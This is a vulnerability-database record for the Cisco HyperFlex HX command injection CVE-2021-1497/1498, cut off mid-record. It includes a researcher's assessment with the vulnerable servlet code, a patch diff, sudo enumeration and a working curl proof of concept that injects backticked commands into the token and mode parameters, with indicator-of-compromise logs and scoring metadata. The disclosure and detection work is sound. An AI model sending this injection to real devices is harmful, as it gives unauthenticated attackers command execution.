DATABASE RESOURCES PRICING ABOUT US

{"id": "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-1497", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:18am UTC reported:\n\n_Attacker value is a little lower because I was able to test only the installer._\n\n# CVE-2021-1497/CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n \n \n --- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n +++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n @@ -69,17 +69,6 @@\n \t</servlet-mapping>\n \n \t<servlet>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n -\t\t<load-on-startup>1</load-on-startup>\n -\t</servlet>\n -\n -\t<servlet-mapping>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<url-pattern>/storfs-asup/*</url-pattern>\n -\t</servlet-mapping>\n -\n -\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n \n\n## Vulnerability\n \n \n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n \n \n \n tomcat7@HyperFlex-Installer-4:~$ sudo -l\n Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:\n !lecture, tty_tickets, !fqdn\n \n User tomcat7 may run the following commands on HyperFlex-Installer-4:\n (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh\n tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help\n Usage: support.py [options]\n \n Options:\n -h, --help show this help message and exit\n -t TARGET, --target=TARGET\n Target directory where the support bundle should go\n (XXX: This could be a remote host(dir), ex:\n hostname:/foo). Optional. Default = /tmp\n -i INSTALLDIR, --installdir=INSTALLDIR\n Install directory for storfs. Optional.\n -k ZKDIR, --zkdir=ZKDIR\n zookeeper directory for storfs. Optional\n -l LOGDIR, --logdir=LOGDIR\n log directory for storfs. Optional\n --asupdir=ASUPDIR asup directory for storfs. Optional\n -c COREDIR, --coredir=COREDIR\n core directory for storfs. Optional\n -m MANIFESTDIR, --manifestdir=MANIFESTDIR\n Manifest directory for storfs support. All files with\n .mfx extension in this directory will be processed.\n Optional\n --list List the manifests. Optional\n -f MANIFESTFILES, --manifest-file=MANIFESTFILES\n Manifest file to use for generating support. Multiple\n manifest files can be specified. Manifests files are\n required to have .mfx suffix. Optional (Cannot be with\n -m option)\n -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR\n log directory for storfs binary files. Optional\n --hypervdir=HYPERVDIR\n log directory for hyperv binary files. Optional\n -o TOOLSDIR, --toolsdir=TOOLSDIR\n Path for storfs tools. Optional\n -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR\n Path for runtime dir (which contains\n storfs_running_process.pid files). Optional\n -b BUILDTYPE, --buildtype=BUILDTYPE\n Build type that was running. Optional. Default = debug\n -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES\n any additional files/directories (not in manifest)\n that should be added to the support bundle. Optional.\n --dry-run Process manifests to make sure that there are no\n errors\n tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx\n /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx\n /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx\n /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx\n /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx\n /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx\n /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx\n /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx\n tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx\n # Springpath manifest file. Contains just basic logs.\n # Simplified from springpath-mgmt.mfx\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/var/jail/var/log/springpath\"]\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/etc/iptables_node_cluster.rules\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"iptables --list -n -v\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"bom-check.sh\"]\n [\"exec\", \"TIMEOUT=120\", \"IGNORE_ERROR\", \"mstcli cluster diag\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli cluster info\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli appliance list\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli datastore list\"]\n tomcat7@HyperFlex-Installer-4:~$\n \n\n## PoC\n \n \n wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n * Trying 192.168.123.133...\n * TCP_NODELAY set\n * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n > POST /storfs-asup HTTP/1.1\n > Host: 192.168.123.133\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 28\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 28 out of 28 bytes\n < HTTP/1.1 200 OK\n < Server: nginx/1.8.1\n < Date: Tue, 18 May 2021 00:54:26 GMT\n < Content-Length: 0\n < Connection: keep-alive\n < Front-End-Https: on\n <\n * Connection #0 to host 192.168.123.133 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\n## IOCs\n \n \n ==> /var/log/nginx/access.log <==\n 192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n \n ==> /var/log/springpath/stBootstrapGuiBackend.log <==\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n \n ==> /var/log/tomcat7/catalina.out <==\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n \n ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n 127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n \n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "published": "2021-05-05T00:00:00", "modified": "2021-05-15T00:00:00", "epss": [{"cve": "CVE-2021-1497", "epss": 0.97462, "percentile": 0.99923, "modified": "2023-05-27"}, {"cve": "CVE-2021-1498", "epss": 0.97462, "percentile": 0.99923, "modified": "2023-05-27"}, {"cve": "CVE-2021-20090", "epss": 0.97409, "percentile": 0.99872, "modified": "2023-05-27"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1497", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "http://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html"], "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "immutableFields": [], "lastseen": "2023-05-27T14:38:19", "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0416", "CPAI-2021-0497", "CPAI-2022-0284"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-1497", "CISA-KEV-CVE-2021-1498", "CISA-KEV-CVE-2021-20090"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "cnvd", "idList": ["CNVD-2021-56801"]}, {"type": "cve", "idList": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-20122", "CVE-2021-38703"]}, {"type": "ics", "idList": ["AA22-279A"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D"]}, {"type": "nessus", "idList": ["BUFFALO_CVE-2021-20090_PATH_TRAVERSAL.NBIN", "BUFFALO_WSR_CVE_2021_20090.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "seebug", "idList": ["SSV:99255", "SSV:99329"]}, {"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36357"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "canvas", "idList": ["NGINX"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0416", "CPAI-2021-0497"]}, {"type": "cisco", "idList": ["CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "cve", "idList": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_CVE-2021-20090_PATH_TRAVERSAL.NBIN", "BUFFALO_WSR_CVE_2021_20090.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "seebug", "idList": ["SSV:99255", "SSV:99329"]}, {"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36357"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1497", "epss": 0.97451, "percentile": 0.99911, "modified": "2023-05-07"}, {"cve": "CVE-2021-1498", "epss": 0.97485, "percentile": 0.99948, "modified": "2023-05-07"}, {"cve": "CVE-2021-20090", "epss": 0.97446, "percentile": 0.99906, "modified": "2023-05-07"}], "vulnersScore": -0.2}, "_state": {"wildexploited": 0, "dependencies": 1685211539, "score": 1685200094, "epss": 0}, "_internal": {"wildexploited_cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "score_hash": "72dcee827fdeab3906e61e7ca0f2f89a"}, "attackerkb": {"attackerValue": 4, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://us-cert.cisa.gov/ncas/alerts/aa22-279a", "published": "2021-12-06T15:04:00"}, {"category": "Threat Feed", "source_url": "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", "published": "2021-12-06T15:04:00"}, {"category": "News Article or Blog", "source_url": "https://securityaffairs.co/wordpress/139821/security/cisco-old-vulnerabilities-exploitation.html", "published": "2021-12-06T15:04:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1497"], "Advisory": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR"], "Miscellaneous": ["http://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2021-12-06T15:04:00"}

{"attackerkb": [{"lastseen": "2023-05-27T14:38:18", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:23am UTC reported:\n\nSee [CVE-2021-1497](<https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c>).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-18T00:00:00", "id": "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "href": "https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:32:01", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version &lt;= 1.02 and WSR-2533DHP3 firmware version &lt;= 1.24 could allow unauthenticated remote attackers to bypass authentication.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T00:00:00", "type": "attackerkb", "title": "CVE-2021-20090", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-05-08T00:00:00", "id": "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "href": "https://attackerkb.com/topics/GHgZ2AFepI/cve-2021-20090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:38:17", "description": "Advance configuration exposing Information Leakage vulnerability in Micro Focus Access Manager product, affects all versions prior to version 5.0. The vulnerability could cause information leakage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-22506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-22506"], "modified": "2021-04-02T00:00:00", "id": "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "href": "https://attackerkb.com/topics/vqXtTK63AE/cve-2021-22506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:33:48", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "attackerkb", "title": "CVE-2021-38703", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-38703"], "modified": "2021-09-14T00:00:00", "id": "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "href": "https://attackerkb.com/topics/Ne1D7fqkxg/cve-2021-38703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:19:06", "description": "An issue was discovered on D-Link DIR-825 R1 devices through 3.0.1 before 2020-11-20. A buffer overflow in the web interface allows attackers to achieve pre-authentication remote code execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-29T00:00:00", "type": "attackerkb", "title": "CVE-2020-29557", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-20090"], "modified": "2021-02-13T00:00:00", "id": "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "href": "https://attackerkb.com/topics/NURCgXZ1KL/cve-2020-29557", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:07", "description": "A remote command execution vulnerability exists in Cisco Hyperflex. The vulnerability is due to improper input sanitization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-20T00:00:00", "type": "checkpoint_advisories", "title": "Cisco HyperFlex HX Command Injection (CVE-2021-1498; CVE-2021-1497)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-11-17T00:00:00", "id": "CPAI-2021-0416", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:12:13", "description": "A command injection vulnerability exists in Cisco HyperFlex HX. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Cisco HyperFlex HX Command Injection (CVE-2021-1497)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1497"], "modified": "2022-06-16T00:00:00", "id": "CPAI-2022-0284", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-16T19:38:03", "description": "A directory traversal vulnerability exists in Buffalo routers. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 